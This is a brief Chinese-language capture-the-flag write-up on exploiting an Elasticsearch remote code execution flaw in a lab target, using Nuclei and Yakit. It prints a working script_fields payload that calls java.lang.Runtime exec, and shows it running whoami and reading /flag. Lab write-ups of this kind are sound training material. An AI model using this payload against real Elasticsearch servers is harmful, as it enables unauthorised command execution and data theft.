查询CNNVD有关漏洞信息
从下方POC、EXP有关漏洞链接以及Github查询可得Payload:
Payload:(上方双斜杠需要换成单斜杠)
{"size":1, "script_fields": {"myscript":{"script": "java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\"whoami\").getText()"}}}
使用Nuclei对靶标进行漏洞扫描
可以看到爆洞URL是:
http://eci-2zeascpohsk7ptpq8lbh.cloudeci1.ichunqiu.com:9200/_search
使用Yakit构造Payload数据包
执行whoami命令,可以看到响应体末尾已经出现回显
执行cat /flag命令,可以看到回显是Base64格式
使用Yakit自带的Codec功能进行解码